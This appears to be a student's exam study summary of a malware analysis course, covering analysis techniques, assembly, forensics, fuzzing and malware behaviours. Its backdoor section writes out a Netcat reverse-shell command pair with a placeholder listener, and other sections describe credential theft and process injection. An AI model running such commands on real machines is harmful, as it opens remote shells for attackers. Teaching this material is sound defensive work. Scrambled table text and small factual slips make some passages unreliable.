Final Exam Summary PDF

Summary

This document provides a summary of the topic of malware analysis, including definitions, types, and fundamental approaches. The document discusses static and dynamic analysis, and describes how these techniques can be useful in detecting malware infections within a network.

Full Transcript

Ch1

Malware: is software intentionally designed to harm or exploit any programmable device, service, or
network.

Types of Malwares

Types Meaning

Malicious software that give an attacker access to a system
Backdoor
and they run commands on the local machine.
Similar to backdoor, it provide the attacker access, but all
Botnet machines who affected with the botnet receive commands
from central command-and-control server.

Downloader This type used to download other malicious software.

Designed to collect data from a victim machine. Example
include sniffers, keylogger, and tools for capturing password
Information-stealing malware
hashes. This malware used to access online accounts like
email or banking.

Launcher A program that launches other malware.

Is a code designed to hide an available malware in the
Rootkit
machine.
Malware that tricks users into purchasing fake software by
Scareware
presenting alarming messages.

Spam-sending malware Infects a machine and uses it to send spam emails.

A malicious software can replicating itself and spreading to
Worm or virus
other computers.

Definition of Malware Analysis

Malware Analysis: is a process of understand the malware how it works, how to identify it, and how to
defeat or eliminate it.

Do You Need Advanced Skills to Perform Malware Analysis?
o You don’t need to be a highly skilled hacker to analyze malware.
What is the Next Step After Identifying Files for Malware Analysis?
o develop signatures to detect malware infections within your network.
 How Can Malware Analysis Help in Developing Signatures?
o They can help in creating both host-based and network-based signatures to detect
malware.

Signatures Meaning Example

- Focus on identifying
changes made by if malware frequently creates
malware on infected files in C:\Temp\Malware, a
Host-based Signatures systems. host-based signature could flag
- Detecting newly created new files created in this
or modified files and directory
registry changes.

- It monitors network
if malware sends data to an IP
traffic to detect
address using non-standard
malware.
Network-based Signatures ports, a signature could be
- It is reducing false
crafted to alert on such
positives and improving
anomalies.
detection rates.

Why is Malware Analysis Important?
o Enables incident responders and security analysts.
o Helps identify and block hidden indicators of compromise (IOCs).
o Improve alerts and notifications related to IOCs.
o Support threat hunting.
Is There Demand for Malware Analysts?
o Professionals in malware analysts are in high demand in the cybersecurity field.
What are the Fundamental Approaches to Malware Analysis?
o Static Analysis: examining the malware without executing it.
▪ It identify (IOCs) such as file names, hashes, IP addresses, domains, and file
header data
o Dynamic Static: running the malware in a controlled environment
▪ Executing the malware in a sandbox or Virtualbox to see how far the malware it
will effect the system.

Malware Analysis Techniques

Techniques Meaning Purpose Limitation

Confirms whether a file is
inspecting the
malicious and provide Sometimes It can’t to
Basic Static Analysis executable file without
more information about detect complex malwares
executing it.
it
 Techniques Meaning Purpose Challenges
involves reverse-
engineering the Requires specialized
Provides a detailed
malware by loading it knowledge in
Advance Static Analysis understanding of what
into a disassembler and disassembly, code
the malware
examining the code structures.
instructions.

Techniques Meaning Purpose Requirement Limitation
Safe execution
involves running Helps in removing environment to
It is not effective
Basic Dynamic the malware to infections, prevent damage
against all types of
Analysis observe its actions producing effective to the system or
malwares.
on the system. signatures network. Like
virtual box

Techniques Meaning Purpose Application

uses a debugger to It used with advance
Extracts detailed
Advance Dynamic investigate the internal static analysis for full
information about the
Analysis state of a running analysis of suspected
malware's operation.
malware executable. malware.

Introduction to Reverse Engineering

Reverse engineering: is the process of analysing a system, software, or hardware to understand its
design, functionality, and operation by disassembling it into its individual components.

The important thing is to see how it works.

Objectives of Reverse Engineering

Why perform reverse engineering?
o To understand the behavior of the malware and the impact on systems.
o To discover the vulnerabilities that help the developers to fix the weaknesses on the
system.
o It can develop of defense mechanisms such as do signatures for antivirus and IDS.
o It helps on learn about malware behavior.
Importance of Reverse Engineering in Cybersecurity

Why is Reverse Engineering Important in Cybersecurity?
o Malware analysis: to understanding the malware and allowing security professionals to
discover the purpose and weaknesses.
o Threat Intelligence: Gives important knowledge about these threats and enable the
organizations to stay ahead of attackers.
o Incident Response: Helps in responding to security incidents by quickly analyzing
suspicious software.
o Forensic Investigations

Ethical and Legal Considerations

Ensuring that the knowledge gained is used to enhance cybersecurity, not to exploit systems or
create harmful tools.
Malware analysts have to protect sensitive information and ensure that reverse engineering is
used for defensive.
reverse engineering on proprietary software without permission could violate copyright laws
Analysts must ensure that reverse engineering activities comply with local and international
laws. Including privacy, intellectual property and software licenses.

Tools for Malware Analysis

Tool Used for Why we use it Popular tools
- used to convert
executable code into
human-readable - to understanding its purpose,
assembly code. logic, and operations. - IDA Pro
Disassembler
- It allows malware - finding any vulnerabilities in - Ghidra
analysts to examine the the system.
structure and behavior of
a program.
- is a tool that allows you - Dynamic analysis: which
to execute malware step allow malware to be run in
- OllyDbg
Debuggers by step and see the controlled environment and
- x64dbg
impact on a system in monitor its behavior.
real-time. - identify malicious functions
- it allows to view file structure
- is a tool used to inspect
such as metadata, headers, or
and modify the raw
embedded code. - HxD
Hex Editors binary data of files.
- analysts can modify its - Hex Workshop
- it displays the content
behaviour for testing
of a file in hexadecimal
purposes.
 format and allow you to
manipulate the data

Environments for Malware Analysis

What is an Analysis Environment?
o Is a controlled setup (Virtual machine) used to run and analyse malware safely without
risking damage to real systems or networks.
Why Use Controlled Environments?
o Safety
o Behavior monitoring

Common Malware Analysis Environments:

Virtual machine
Sandboxes
 Ch2

Definition of Static Analysis

Static analysis is the process of inspecting malware or suspicious software without executing it.

This is used to gather information about the structure, content, and behavior of malware.
It minimizes the risk of spreading malicious code.
It shows details of:
o File header
o Imported functions
o Embedded strings

Objective of Static Analysis

The main goal of static analysis is to safely extract as much information such as:

Metadata (file creation date, file type)
Identifying suspicious or malicious characteristics (file size, abnormal headers)
Recognizing key indicators (embedded IP addresses, C2 servers)
Gaining insights into functionality (use of certain libraries or APIs)

Basic Techniques of Static Analysis

1- File Signature Analysis

File signature analysis: it helps in identifying the type and structure of a file.

Sometimes malware authors hide malicious files to appear as non-threatening file types. For
example, an (.exe) file could be renamed as an image file (.jpg) or a document (.doc).

File signature useful for:

1. Detecting Obfuscation: Many malware authors use techniques like compress or encrypting the
payload, making it harder to analyze.
2. Identifying File Types: Verifying if the file is renamed, such as an.exe file pretending to be a.pdf.
3. Understanding Packing Tools: recognizing if the file uses these tools.
4. Checking for Known Malware: Sometimes, malware uses same packing or signature structure
which make it easier to identify.

Headers and Sections of Portable Executable File Formats:

a lot more data may be found in the headers of PE files.
The PE file format consists of a header followed by several sections.
The header is packed with information because it holds metadata about the file.
After the header file, we may access the file's parts, which provide essential information.
Exe Header Information

Here are some examples of common file signature headers:
Use a Hex Editor to Analyze the File Header:

Exploring the header reveals key information that identifies the file type:

1

2

3

4

5

Attribute of file header:
String Analysis:

1. First, it breaks the piece of code down into smaller chunks known as (tokens).
2. We use Python tokenize module (regular library).
3. It uses to analyze suspicious files to understand it’s hidden strings.

- Extracting string:

1. Use a tool to extract strings from the malware binary.
2. Linux: Use the strings command.
3. Windows: Use tools like PE-sieve
4. Analyze Strings: Review the extracted strings to identify any patterns like file paths, URLs,
registry keys, or API function names that might hint at the malwares.

Disassembly and Decompilation

Disassembly: is the process of converting the machine code (binary instructions) of an executable file
back into low-level assembly language.

Assembly language is closely tied to the hardware and provides a near one-to-one instruction to
CPU.
Disassemblers are used to reverse this process.

Characteristics of Disassembly

1. Low-level code: it generates code that is close to the original machine instructions, with no
complex logic structures (like loops or conditions).
2. Processor-specific: The assembly code depends on the architecture of the processor (like x86,
ARM)
3. Readable but hard to understand: The code is human-readable, but it requires knowledge of the
CPU instruction.

Tools for Disassembly

IDA Pro: it is widely used.
Ghidra: free disassembler developed by NSA
 Radare2: open-source disassembler and reverse engineering framework.

Example of Disassembly

This shows that the malware is calling VirtualAlloc (a common API used to allocate memory), which
used to inject malicious code into the allocated memory.

Decompilation is the process of transforming the binary executable into higher-level source code.

It offers a more abstract and readable of the original code, which it is closer to the source code.

Characteristics of Decompilation

1. High-level code: The output resembles the original source code, it shows high-level construct
(like if statements, loops, and function calls)
2. Easier to understand
3. Not perfect: it may struggle with optimized binaries, making the resulting code incomplete or
hard to understand.

Tools for Decompilation

Ghidra
Hex-Rays Decompiler (IDA Pro plugin)
RetDec: open source

Example of Decompilation

1. The malware is downloading a payload from a malicious domain.
2. The payload is saved to a local file and then executed.
Comparison
 Ch3

Definition of Dynamic Analysis

Dynamic analysis: involves executing a program or malware sample in a controlled environment to
observe its behavior and understand its impact in real-time.

Objective of Dynamic Analysis

The primary objective of dynamic analysis is:

to analyse malware's runtime behaviour to detect hidden functionality.
understand its communication patterns.
identify the impact on the target system.

Basic Techniques of Dynamic Analysis

Sandboxing
Debugging
Memory analysis
Monitoring system changes
o File modifications
o Process creation
o Network activity

These methods allow analysts to detect malware behaviours that are not visible through static
analysis, such as:

Code injection
Runtime decryption
External communications with command-and-control servers.

Sandboxing

Sandbox is a virtualized environment where suspicious programs (malware) are executed safely to
observe their behavior without risking the actual system.

It isolates malware execution from affecting real systems.
It allows observation of real-time behavior like file changes, network traffic.

Key Components of a Sandbox Environment:

Virtualization: Running the malware inside a virtual machine to protect the host.
Logging Mechanisms: The sandbox logs all system-level activities performed by the malware.

How is Sandbox Working:
1. File Submission:

File Input: A file (commonly a PE file on Windows) is submitted to the sandbox for analysis.
Unknown Nature: the file's nature is unknown; may could be malware or goodware.
PE File: PE (Portable Executable) is a common format for Windows executables (.exe,.dll)

2. Execution in a Sandbox:

Execution: The file is executed inside a controlled, isolated environment like virtual machine
(VM)
Isolation: The sandbox ensures the file’s behavior does not impact the real system or network.
Monitoring: During execution, the sandbox monitors all the file's actions, such as:
o File modifications
o Process creation
o Registry changes
o Network activity

3. Generating the Report:

After analyzing in sandbox, make a detailed report summarizing all observed behaviours.

Key Metrics in the Report:

File system changes
Network communication
Registry modifications
Process injection

Pros and Cons of Sandboxing

Debugging Techniques in Malware Analysis
1. Debugging: is the process of analysing a program by running it step-by step, setting breakpoints, and
examining its state (registers, memory, instructions) in real-time.

Key Concepts in Debugging:

Breakpoints
Stepping
Code Manipulation

2. Stepping: The act of executing code one instruction at a time, which helps in tracking the flow of the
malware.

Step-Over: Executes a single instruction without stepping into function calls.
Step-Into: Allowing you to observe its execution in detail.

3. Code Manipulation: Modify the malware's code during runtime to observe how changes affect its
behavior.

Popular Debugging Tools:

OllyDbg: A 32-bit debugger that allows setting breakpoints, stepping through code, and viewing
memory/register states.
x64dbg: Similar to OllyDbg but supports 64-bit malware.
WinDbg: A more advanced debugger for analyzing both user-mode and kernel-mode malware.

Breakpoints in Malware Debugging

Breakpoints: are critical tools in debugging, allowing analysts to pause malware execution at specific
points to inspect the current state of the system.
Memory Analysis

Memory analysis involves examining a system's memory (RAM) to identify malware-related
artifacts that may not be visible through static or file-based analysis.

Key Objectives of Memory Analysis:

1. Discovering Code Injection
 2. Finding Hidden Processes
3. Decrypted Payload Detection
4. API Calls

Key Memory Artifacts to Analyse:

Processes and Threads: Identify which processes are running
Loaded Modules: Look for suspicious DLLs or injected code
Network Connections: Malware's connections to external C2 servers
Handles and Descriptors: These can be used to track file and registry access from memory.

Tools for Memory Analysis:

Volatility: An open-source memory forensics, can analyze the memory.
Process Hacker: A tool for real-time memory monitoring.
Process Monitor: Used for tracking real-time memory

Dynamic Malware Analysis- Monitoring Malware Behaviour in Real-Time

File and Process Monitoring: Using Process Monitor to capture file system changes
Network Traffic Analysis: Capturing outbound/inbound traffic using Wireshark
API Call Logging: Tools like API Monitor to detect which system calls the malware relies on.

Comprehensive Dynamic Analysis Workflow
 Ch4

4.1 Review of basic Assembly Language

From Source code to execution

This image shows how C source code is converted into machine code and then executed.

Source Code: The C code on the left is the human-readable part.
Compilation: The command gcc first.c -o f compiles this code. This involves several steps:
o Preprocessing
o Compiling
o Assembling
o Linking
Machine Code: The right side shows the result in hexadecimal format.
Execution: Finally, the machine code is run on the computer.
Assembly language

1. Lower-level programming language translated to machine code and controls hardware
2. Hardware specific with human-readable code
3. Processor dependent (x86 assembly for x86 processors,x64, MIPS, PowerPC , and ARM)
4. Instruction set (RSIC , CISC)

RISC → Reduced instruction Set Computing → one clock per instruction

CISC → Complex instruction set computing --> multiple operations (multiple clocks) in singe instruction

The Instruction Set Architecture (ISA)

Memory Management

Stack memory: a memory space to store local variables of specific function

Heap memory: a memory space which is independent to function scopes. Allows dynamic memory
allocation

Data Segment: Stores initialized global and static variables.
BSS Segment: Stores uninitialized global and static variables.
Text Segment: Contains the code.
Stack: Stores local variables, function calls, and return addresses.
Heap: Dynamic memory allocation, where the program requests memory at runtime using
functions like malloc() and free().
Registers

Register is a small amount of data storage available to the CPU.

In x86 registers fall into four categories:

General registers are used by the CPU during execution.
Segment registers are used to track sections of memory.
Status flags are used to make decisions.
Instruction pointers are used to keep track of the next instruction to execute.

Segment registers
x86-64 data types

Flags

The EFLAGS register is a status register.

The following flags are most important to malware analysis:

Flags Name Description

ZF Zero flag is set when the result of an operation is equal to zero

is set when the result of an operation is too large or too small for the
CF Carry flag
destination operand
is set when the result of an operation is negative or cleared when the result
SF Sign flag
is positive.
is used for debugging. The x86 processor will execute only one instruction at
TF Trap flag
a time if this flag is set.
x86-64 instruction format

Opcode (Operation Code): This is the part of the instruction that tells the CPU what operation to
perform (e.g., mov, add, sub, etc.).

Operand: This is the data or the address of the data that the operation will be performed on (e.g.,
registers, memory addresses, or immediate values). ebx, eax

Simple Instructions examples

Arithmetic examples

Branching

Branch is a sequence of code that is conditionally executed depending on the flow of the program
Processor dependent (Intel vs Arm)

4.2 x86 Architecture details

Modern computer architecture (including x86) follows the Von Neumann architecture, it has three
hardware components:

CPU executes code.
RAM stores all data and code.
(I/O) System interfaces with devices such as hard drives, keyboards, and monitors.

1. The control unit gets instructions to execute from RAM using a register, which stores the
address of the instruction to execute.
2. Registers are the CPU’s basic data storage units and are often used to save time so that the CPU
doesn’t need to access RAM.
3. The arithmetic logic unit (ALU) executes an instruction fetched from RAM and places the results
in registers or memory.
4. The process of fetching and executing instruction after instruction is repeated as a program runs.
4.3 Instruction set Extensions

SSE: Streaming SIMD extension

SSE introduces 8 new registers, called xmm0 through xmm7 (and xmm8-xmm15 on 64-bit machines).

Each register contains four 32-bit single-precision floats.
o "ps", for "Packed Single-precision".
o "add" adds two integer registers, like eax and ebx.
o "addps" adds two SSE registers, like xmm3 and xmm6.
o SSE versions of most other arithmetic operations: subps, mulps, divps
There are actually two flavors of the SSE move instruction:
o "movups" moves a value between unaligned addresses
o "movaps" moves a value between aligned addresses.

AVX: Advanced vector extensions

Uses 256-bit registers - up to 8 floats, or 4 doubles
It operates on larger chunks of data at higher speed.
Data Types

Arithmetic instructions

4.4 Advanced instruction-level optimization

Identifying the most critical part of the software is therefore necessary if you want to improve
the speed of computation.
Reducing the code size can also improve the decoding of instructions.
Reading from the level-1 cache takes approximately 3 clock cycles.
Reading from the level-2 cache takes in the order of magnitude of 10 clock cycles.
Reading from main memory takes in the order of magnitude of 100 clock cycles.
Optimizing for speed

The above code multiplies [mem1] by 6 and adding 2 to [mem3].
If it happens that [mem1] is not in the cache, then the CPU has to wait many clock cycles
it depends on the output of the first instruction, so It can’t do the second instruction imul eax,6
it is possible to execute mov ebx,[mem3] and add ebx,2 while it is waiting for [mem1].

The above code is changed inside the CPU to a code that uses four different physical registers for
eax.
o The first register is used for the value loaded from [mem1].
o The second register is used for the output of the imul instruction.
o The third register is used for the value loaded from [mem3].
o The fourth register is used for the output of the add instruction.

Optimizing for size

PUSH and POP instructions with an integer register take only one byte.
XCHG EAX,reg32 is also a single-byte instruction and takes less space than a MOV instruction,
but XCHG is slower than MOV.

Instructions with pointers take one byte less when they have only a base pointer.

Data addresses take less space if they can be expressed as a pointer and a displacement
Optimizing memory access

Catching code and data is extremely important for performance.
If the code has many cache misses, and each cache miss costs more than a hundred clock cycles.
Loading double constant from register (64 bit mode) is better than loading double constant from
data segment.
 Ch5

Control Flow Analysis and Graphing

Control Flow Analysis (CFA) involves understanding the sequence and logical path that a malware takes
through its execution.

Control Flow Graph (CFG) represents the program's different logical paths.

Components of a Control Flow Graph:

Nodes: Represent basic blocks, which are straight-line sequences of instructions.
Edges: Represent jumps, branches, or calls between basic blocks. For instance:
o A conditional branch may create two edges (true and false outcomes).
o A call to another function will create an edge connecting the caller block to the callee
block.

Purpose:

Help identify loops, decision points, and the overall structure of malware code.
Useful for locating anti-analysis features like dead code.

Graphing Techniques:

Focus on high-level nodes first to identify function entry points.
Look for loops and conditions which may be responsible for repetitive malicious activities.

Control Flow Graph Analysis Techniques

Identifying Critical Execution Paths:
o anti-analysis branches. By examining CFGs, you can identify which paths contain
suspicious instructions, such as calls to system functions or network functions
Understanding Anti-Analysis Techniques:
o CFGs can reveal blocks that divert the control flow, such as sandbox environments,
debuggers, or virtual machines.
Identifying Obfuscation and Junk Code:
o Some malwares will insert junk instructions to mislead analysts or to prevent automated
analysis tools from correctly understanding the logic.
o Code Flattening is a technique used by malware developers to make CFGs very large and
confusing. By focusing on critical nodes.
Control Flow Integrity (CFI) Checks:
o CFGs can be used to compare expected control flow against actual flow during dynamic
analysis.
Data Flow Analysis

Data Flow Analysis is an examination of how data values are generated, modified, and used across the
program.

Malware may use certain variables to store encryption keys, sensitive data like stolen
credentials, or even configuration data for Command and Control (C2) servers.
It helps identify how sensitive data is manipulated or how malware interacts with system
resources.

Techniques:

Taint Analysis: Tracks how specific data (e.g., a user input string) moves through the malware
code. tracking how malware handles compromised credentials.
Data Dependencies: Analyze which instructions depend on certain variables or memory
addresses. For example, keyloggers

Advanced Code Navigation and Cross-Referencing

Cross-referencing involves identifying relationships between different parts of a binary, such as which
functions are called by other functions

Importance:

Understanding code relationships and cross-references allows analysts to see how different
components of the malware interact.
Cross-references can reveal critical interactions, like calls to API functions which responsible for
critical tasks like injecting code

Types of Cross-References:

Types Meaning Example
which functions are being
Connections between functions
Code Cross-References called by a specific piece of
or blocks of code
code.
Reference to variables or identifying where a
Data Cross-References constants used throughout the suspicious string (e.g., a URL
program. or file path) is used.
Use in Malware Analysis:

In ransomware, cross-referencing can help locate the encryption routine and see where the
encryption key is being generated or used.

Automated Pattern Recognition for Malware Signature

This technique focuses on identifying patterns in malware binaries that can be used to develop
signatures for detection.

Signature Types:

Types Meaning Example
used to quickly match the
A simple, unique hash generated
Hash-Based Signatures malware against known
from the malware binary
samples.
API calls to
Identify specific behaviors or WriteProcessMemory
Behavioral-Based Signatures sequences of API calls that are followed by
unique to a family of malware. CreateRemoteThread can
indicate process injection.
Use specific sequences of
assembly instructions that are
Code Pattern Signatures --
characteristic of malware
families.

Techniques and Tools:

YARA: A rule-based pattern-matching tool used to create malware signatures.
BinDiff: Used to compare changes across versions of malware binaries and identify any
modifications.

Automated Tools:

FLIRT (Fast Library Identification and Recognition Technology), a feature in IDA Pro, helps
identify known libraries used by malware, making it easier to focus on unique code and ignore
standard functions.

Usage in Detection:

Signature creation from automated pattern recognition is widely used in antivirus and intrusion
detection systems.

Challenges:

Polymorphism: Malware authors often use techniques to generate new code

Code Obfuscation:
 Strings may be encoded, or control flows altered, which makes signature creation more
challenging without applying techniques like deobfuscation.
 Ch6

Introduction to Advanced Dynamic Analysis Techniques

Dynamic analysis allows malware analysts to observe the behavior of malicious software while it
executes in a controlled environment.

Importance of Dynamic Analysis in Malware Detection

Dynamic analysis plays a critical role in detecting:

Malicious payloads that are only executed under specific conditions.
Malware is designed to evade static analysis.
Techniques for analyzing different malware types such as trojans, ransomware, and rootkits.

Introduction to Kernel-Level Debugging

Kernel-level debugging involves analyzing the code that runs in kernel mode.
Kernel-mode code has unrestricted access to system resources which is make it primary target
for advance malware.
Kernel-level malware can modify system behavior, hide processes, and avoid detection.

Why Kernel-Level Debugging is Important

It allows detection of rootkits that operate deep within the system.
Help identify privileged malware techniques
Help understanding of how malware manipulates low-level system components.

Key Concepts in Kernel-Level Debugging

1. Kernel Mode vs. User Mode:
Kernel mode has full access to the system.
User mode is restricted.
2. Rootkits:
Malware is designed to hide themselves and continue in kernel mode.
3. Function Hooking:
A technique to intercept function calls to system APIs.

Tools for Kernel-Level Debugging

Tools Used for Example
A comprehensive debugger for examine system calls, memory
WinDbg analysing both user-mode and access, and potential malware
kernel-mode applications. injection points.
Used for debugging kernel
KD (Kernel Debugger) components from a remote --
machine.
Common Malware Techniques in Kernel Level Malware

Code Injection:

Malware injects code into other processes to remain hidden.

Process Hiding:

Rootkits modify the kernel to hide processes from task managers and security tools.

Hooking System Functions:

Intercepting critical OS functions to alter behavior or hide malicious activity.

Analyzing Network Communications of Malware

Network analysis is critical to understanding how malware communicates with Command and Control
(C2) servers.

Malware communicates through standard protocols like HTTP, DNS, or custom protocols to
exfiltrate data
Analysts track and block these communications to isolate malware activities.

Network Traffic Analysis Tools

1. Wireshark:

Used for capturing and inspecting traffic in real-time.

Example:

In this example, a malware sample is found communicating with a remote C2 server. Using Wireshark,
we can:

1. Filter HTTP traffic.
2. Identify suspicious domains and IP addresses.
3. Trace the exfiltration of data or the download of malicious payloads.

2. tcpdump:

A command-line tool for capturing network packets for offline analysis.
Understanding Network Protocols Used by Malware

Interpreting Network Packets

1. Filtering Packets:
o Using tools like Wireshark, analysts filter traffic based on protocols or suspicious IP
addresses.
2. Detecting C2 Communications:
o include repeated connections to the same IP/domain, encrypted traffic, or unusual
packet sizes.

Memory Forensics Overview

Memory forensics is used to analyze malware that resides only in memory or injects malicious code into
other processes.

Analysts can find:

Unusual process injections
Hidden processes
Suspicious network connections from memory dumps.

Memory Forensics Techniques

Memory forensics is the process of analysing a system's memory to uncover malware that locate in
RAM.

Purpose:

Detect malware that may not leave traces on disk.
Retrieve information on active processes, injected code, and network connections.

Artifacts in Memory Forensics:

Hidden Processes
Suspicious Connections: ip address and domains
Memory Forensics Tools

1. Volatility: A powerful framework for analysing memory dumps, identifying injected code, and
detecting hidden processes.

Common Commands and Techniques in Volatility:

pslist: Lists running processes to detect anomalies.
netscan: Identifies open network connections.
malfind: Scans for malicious injections in memory.

2. FTK Imager: Useful for acquiring and imaging memory for forensic analysis.

Fuzzing Techniques Overview

Fuzzing is a software testing technique that involves providing invalid, unexpected, or random data as
inputs to a program.

Purpose of Fuzzing:

To detect bugs or vulnerabilities by observing crashes, unexpected behavior, or security flaws in
the software.
Uncover vulnerabilities that may not be easily identifiable through static analysis.
Test the robustness and security of software
Help identify memory corruption issues, such as buffer overflows, and input validation failures.

Types of Fuzzing:

Types Description Useful for
Inputs are generated from scratch for well-documented file
Generation-based Fuzzing according to predefined rules, formats or network
specifications, or protocols. protocols.
Inputs are gained by altering existing Useful when you have a
Mutation-based Fuzzing
valid inputs set of valid inputs

Black-box vs. White-box Fuzzing
Fuzzing Tools Overview

Fuzzing Process

Step-by-Step Guide:

Define the Target:
o Select the software component to fuzz (e.g., a file parser, network protocol handler, or
API).
o Identify the input format, which could be files, packets, or command-line inputs.
Instrument the Target (for White-box Fuzzing):
o to compile the target with feedback mechanisms that track code coverage. (tools like
AFL or Peach)
Create a Fuzzing Campaign:
o Define the scope of the campaign: the types of inputs to generate, maximum time to
run the campaign, and how deep to explore input variations.
o Set up fuzzing environments (e.g. virtual machines)
Monitor for Crashes:
o Run the fuzzing tool and monitor for any crashes, failure, abnormal outputs.
Analyze the Results:
o Review crash logs and core dumps to identify potential vulnerabilities.
o Reproduce crashes and understand the cause
Common Outcomes:
o Crash Dumps: A crash log is generated when a specific input causes the program to fail.
o Coverage Reports: Tools like AFL provide coverage reports indicating which parts of the
code were executed during fuzzing.
o Test Case Generation: A collection of test cases that caused the program to behave
abnormally are saved for further investigation.
 Ch7

Understanding Common Malware Behaviors

Common Malware Behaviors

1. Downloaders:

It is malware that downloads additional malicious software from the Internet in the system.

How Downloaders Work:

Utilize the Windows API URLDownloadToFileA to fetch malware.
Followed by a call to WinExec to execute the downloaded malware.

2. Launchers:

It is executable that install malware.

The Role of Launchers:

To deploy malicious payloads onto targeted systems.

3. Backdoors:

provides attackers remote access to a victim’s system, communicate over common ports, like
port 80, using HTTP

Backdoor Types

1. Reverse Shells:

A reverse shell connects from an infected machine to give shell access to attackers.
Used as malware software or in sophisticated backdoors.
Allow attackers to execute commands.

2. Netcat Reverse Shells:

Netcat can create a reverse shell by running commands on two machines. Victim connects to the
attacker’s machine, providing shell access using specific commands.

When Netcat is used as a reverse shell, the remote machine waits for incoming connections using the
following:

nc -l –p 80

sets Netcat to
-l
listening mode
set the port on
-p
which to listen.

The victim machine connects out and provides the shell using the following:
nc listener_ip 80-e cmd.exe

specifies the IP
address and
listener_ip 80 port on the
remote
machine.
run a program
once the
-e
connection is
made

3. Windows Reverse Shells:

Two primary coding methods: basic and multithreaded.
o Basic method involves CreateProcess and manipulation of the STARTUPINFO structure.
o Multithreaded version utilizes sockets, pipes, and threads for data manipulation.

4. Remote Administration Tools (RATs):

It allow remote management of computers, often used in targeted attacks.
It control fewer hosts than botnets.
It communication occurs over common ports for stealth.

5. Botnets:

A botnet is a collection of compromised hosts known as zombies.
Used for mass attacks and to spread additional malware or perform DDoS attacks.
Can take websites offline by overwhelming them with traffic.

Credential Stealers

Credential Stealers is a malware designed to steal user credentials.

Three primary types:

Login interception: Programs that wait for a user to log in in order to steal their credentials.
Hash Dumping: Programs that dump information stored in Windows, such as password hashes.
Keystroke Logging: Programs that log keystrokes.
Credential stealing through the GINA interception method

Graphical Identification and Authentication (GINA): It allows third-party customization of the Windows
logon process.

Malicious actors exploit this feature to inject their credential-stealing malware.

How GINA Interception Works:

It runs as a Dynamic Link Library (DLL), loading during user login.
Malware, like fsgina.dll, can be injected into this process.
Intercepts user credentials and logs.

Example of GINA Interception:

fsgina.dll is a malicious file placed in the GINA registry location.
It functions between Winlogon and legitimate msgina.dll to capture credentials.
Once captured, credentials are either saved locally or sent over a network.

Credential stealing through Hash Dumping

Hash dumping involves extracting LM and NTML password hashes from the Security Account
Manager (SAM).
Popular tools like Pwdump and the Pass-the-Hash (PSH)

How Pwdump Works:

Pwdump operates by DLL injection into the LSASS process
It uses invalidated Windows functions to extract password hashes from the user accounts.
Understanding the unique API calls made by variants of pwdump is crucial for malware analysis.

Keystroke Logging

Keystroke logging: is a method used by malware to record keystrokes. Attackers can observe typed data,
such as usernames and passwords.

Malware uses kernel-based and user-space keyloggers:

Kernel-Based Keyloggers
o difficult to detect.
o part of a rootkit.
o It act as keyboard drivers to capture keystrokes.
User-Space Keyloggers
o It use Windows API functions.
o Can implement either hooking or polling methods to log keystrokes.

User-space keylogger types

Hooking Keyloggers:
o Leverage the Windows API function SetWindowsHookEx.
o Notify malware each time a key is pressed.
 o Can include a DLL file to handle logging
Polling Keyloggers:
o Use GetAsyncKeyState to identify key states.
o GetForegroundWindow identifies the active window for context.
o Process repeats quickly to keep up with user typing.

Persistence Mechanism

Persistence refers to the ability of malware to remain on a system over time.

Key methods include registry modifications and file compromises.
Understanding persistence helps in detecting and mitigating malware.

Registry Manipulation:

Malware often modifies the system’s registry to reach persistence.
Common registry keys targeted include
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
Persistence can be enhanced through specific entries like AppInit_DLLs and Winlogon Notify.

Registry Analysis

AppInit_DLLs:

It is loaded into every process that invokes User32.dll.
Adding a DLL to this registry key ensures its loading across multiple applications.
This technique allows for widespread execution of the malicious code.

Winlogon Notify:

Malware can hook into Winlogon events (logon, logoff)
This help in execution during critical system events.
Winlogon hooks can be leveraged even in safe mode.

SvcHost DLLs:

Malware can register as a Windows service to achieve persistence.
Services run under the svchost.exe process
Malware authors often employ specific registry configurations to integrate with existing services.

Trojanized System Binaries:

This method involves modifying system binaries.
It is targeted for hidden malware deployment.
Code modifications allow the malicious payload to execute before returning control.

DLL Load-Order Hijacking:

This technique allows malware to load a malicious DLL
 Malicious DLLs can be placed in directories

Privilege Escalation

Malware often requires elevated privileges to manipulate system processes.
SeDebugPrivilege is a common tool used by malware for full system access.
o Administrator accounts can enable this command
o It gain access to system-level
AdjustTokenPrivileges is used to set the access token to enable this privilege.

Detecting and Analysing Rootkit

Rootkits modify system functionalities to hide malicious activity.
Can operate at the user or kernel level.

Types of Rootkits:

User-mode rootkits interact with applications to hide processes and files.
Kernel-mode rootkits modify core OS functionalities for deeper hiding.

Rootkit Analysing Techniques

Hooking Techniques:

IAT Hooking modifies Import Address Table to redirect legitimate function calls to malicious
code.

DLL Load-Order Hijacking:

DLL hijacking exploits default load order to replace legitimate DLLs with malicious ones.

Detecting and Mitigating Malware:

Monitor for unusual behaviours indicative of rootkit activity.
Regularly update systems and software to protect against vulnerabilities.
Utilize advanced security tools

Process Injection and Hook Injection

Process Injection

Process Injection is a type of launcher. It Injects code into another running process, making it execute
malicious code.

Hide malicious behavior and sometimes bypasses security mechanisms.
Common Windows API Functions:

OpenProcess: This function is used to obtain a handle to a target process. It allows the malware
to gain access to the victim process's memory and resources.
VirtualAllocEx: Allocates a region of memory in the address space of a specified process.
WriteProcessMemory: Writes data to the memory of a specified process. This function is used to
transfer the malicious code or DLL name into the allocated memory
CreateRemoteThread: Creates a thread in the context of a specified process. This function
allows the malware to execute code

Process Injection Techniques

Hook Injection

Hook injection allows malware to intercept messages and load malicious code.

Types of hooks:

Local
Remote
 Ch8

Polymorphic and Metamorphic

Analysis of fileless Malware

Fileless malware operates without traditional files. It resides in the computer's memory (RAM) instead
of the hard drive. It uses legitimate programs to execute malicious activities.

How Fileless Malware Works Content:

Infection methods: Phishing emails, malicious links, and attachments
Execution: Uses trusted applications like PowerShell and Windows Management
Instrumentation (WMI)
Persistence: Stays in memory and avoids detection by traditional antivirus software

Techniques Used by Fileless Malware

Memory-resident malware: Operates entirely in RAM
Registry malware: Uses Windows registry for persistence
Script-based attacks: Utilizes scripts like PowerShell and VBScript

Examples of Fileless Malware:

Poweliks: Uses Windows registry for persistence.
Kovter: Operates in memory and uses registry keys.
Duqu 2.0: Advanced persistent threat (APT) that resides in memory.
Components of Hardware Level Analysis

Firmware
BIOS (Basic Input/Output System)
Hardware interfaces

Firmware Analysis Techniques:

Static Analysis: Examining the firmware code without executing it.
Dynamic Analysis: Running the firmware in a controlled environment to observe its behaviour.
